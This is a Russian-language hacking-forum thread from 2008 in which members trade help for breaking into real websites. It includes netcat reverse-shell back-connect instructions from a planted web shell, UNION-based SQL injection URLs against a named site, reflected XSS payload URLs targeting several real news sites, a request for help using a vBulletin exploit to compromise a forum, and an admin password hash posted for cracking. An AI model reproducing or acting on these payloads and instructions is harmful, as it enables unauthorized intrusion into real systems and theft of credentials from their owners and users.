Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    diznt, из шелла конектись к серваку рутай и ставь что надо........
    скачай netcat? хапусти и набери nc -l -n -v -p 3137, в шелле пропиши свой РЕАЛЬНЫЙ ip и нажми бакконект....
     
  2. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    Скуля??
    http://vdex.spb.ru/photo/subcat.php?id_catalog=%27
    просто на такой же цмске раскрутил нормально а здесь что то никак(
     
  3. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Слепая sql-inj
    http://vdex.spb.ru/photo/subcat.php?id_catalog=3/**/union/**/select/**/1,2/*
     
    4 people like this.
  4. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    ребята, помогите по братски. надо как небудь проникатся один форум на движке: vBulletin® Version 3.7.3.
    поиском конечно пользовался и нашел вот этот эксплоит: http://milw0rm.com/exploits/7174

    Теперь никак не могу понять как волпользоватся данным эксплоитом. можете помочь ?
    а также был бы очень рад, если подсказали другие способы.
     
  5. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    -m0rgan-
    омг, какой си ?? Это js


    сохраняешь код в nbd.js, заливаешь на сервер
    дальше по инструкции:


    +
    Си сплойты надо сначала скомпилировать, а потом запускать... ;)
     
    #4245 aka PSIH, 24 Dec 2008
    Last edited: 24 Dec 2008
    1 person likes this.
  6. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Spyder
    был бы разрешен я бы об этом обезательно написал )

    ILYAtirtir
    там все просто..
     
  7. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    5.1.2600.2180.
    Почему при удаленном коннекте меня выкидывает ? Версия-то termsrv.dll не старая.
     
    #4247 Велемир, 25 Dec 2008
    Last edited: 25 Dec 2008
  8. tsesar

    tsesar Banned

    Joined:
    30 Jan 2008
    Messages:
    0
    Likes Received:
    12
    Reputations:
    -9
    http://www.newsarmenia.ru/search/?p=0&query=%22%3E%3Cscript%3Ealert(%2FoO%2F)%3C%2Fscript%3E
     
  9. tsesar

    tsesar Banned

    Joined:
    30 Jan 2008
    Messages:
    0
    Likes Received:
    12
    Reputations:
    -9
    http://www.newsazerbaijan.ru/search/?p=0&query=%22%3E%3Cscript%3Ealert(%2FoO%2F)%3C%2Fscript%3E
     
  10. tsesar

    tsesar Banned

    Joined:
    30 Jan 2008
    Messages:
    0
    Likes Received:
    12
    Reputations:
    -9
    http://www.pln-pskov.ru/search/?text="><script>alert(%2FoO%2F)<%2Fscript>&sortby=time
     
  11. tsesar

    tsesar Banned

    Joined:
    30 Jan 2008
    Messages:
    0
    Likes Received:
    12
    Reputations:
    -9
    http://lipetsknews.ru/search/?search=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FoO%2F%29%3C%2Fscript%3E&k=%CD%E0%E9%F2%E8
     
  12. tsesar

    tsesar Banned

    Joined:
    30 Jan 2008
    Messages:
    0
    Likes Received:
    12
    Reputations:
    -9
    http://www.snews.ru/search.php
     
  13. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    tsesar
    Ничего не перепутал? xD
     
    1 person likes this.
  14. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    ну или хоть скажите суть этого эксплоита.
     
  15. [dei]

    [dei] Active Member

    Joined:
    24 Nov 2008
    Messages:
    171
    Likes Received:
    112
    Reputations:
    5
    B1t.exe
    XSS в модуле Visitor Messages
     
  16. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    [dei]
    ну да, это круто, но мне надо понять эффективнось этого скрипта, суть..
    и вообше стоит братся за это - в целях взлома форума ?
     
  17. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    Подскажите, как можно раскрутить скулю
    Там инъекция есть, просто сразу перебрасывает на страницу с ошибкой, поэтому вернитесь на страницу назад.
     
    #4257 Thrasher88, 26 Dec 2008
    Last edited: 26 Dec 2008
    2 people like this.
  18. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    c чего ты взял что там есть инъекция?вывод на 1 и на 9999 одинаковый..по моему там скулей даже и не пахнет..
     
  19. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    Ну хз скуля это или нет.. вот что выводит:
     
    #4259 Thrasher88, 26 Dec 2008
    Last edited: 26 Dec 2008
  20. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    admin:4b6dP//qJjChSbt+7It3DYY=
    Что за хеш?
     
Thread Status:
Not open for further replies.